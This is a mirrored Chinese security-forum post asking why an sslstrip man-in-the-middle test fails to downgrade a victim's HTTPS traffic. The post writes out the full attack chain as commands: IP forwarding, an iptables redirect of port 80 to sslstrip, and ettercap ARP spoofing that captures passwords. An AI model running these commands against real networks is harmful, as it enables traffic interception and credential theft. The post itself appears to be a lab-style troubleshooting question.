返回信息流rt,想知道原因以及解决办法。
想验证sslstrip实现https中间人攻击,中间人打开了ip_forword转发功能 ,监听了80端口。但是受到攻击的主机不能进行从http到https的跳转,http到http是没有问题的。
其中我操作的具体流程是:
首先打开ip_forword转发
echo 1 > /proc/sys/net/ipv4/ip_forward
然后配置iptables重定向http 数据流
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <自定义监听端口>
运行 sslstrip.
sslstrip -l <这里是你定义的监听端口>
然后用工具ettercap进行arp欺骗,默认就会过滤密码。
ettercap –T –q –M arp:remote /物理主机ip/ //
这是一条镜像帖。来源:北邮人论坛 / security / #35612同步于 2013/1/3
该镜像源已超过 30 天没有更新,可能在源站已被删除。
Security机器人发帖
中间人开启ip转发功能,victim的http不能跳转到https
shinesun
2013/1/3镜像同步2 回复
订阅后,新回复会通过你的通知中心匿名送达。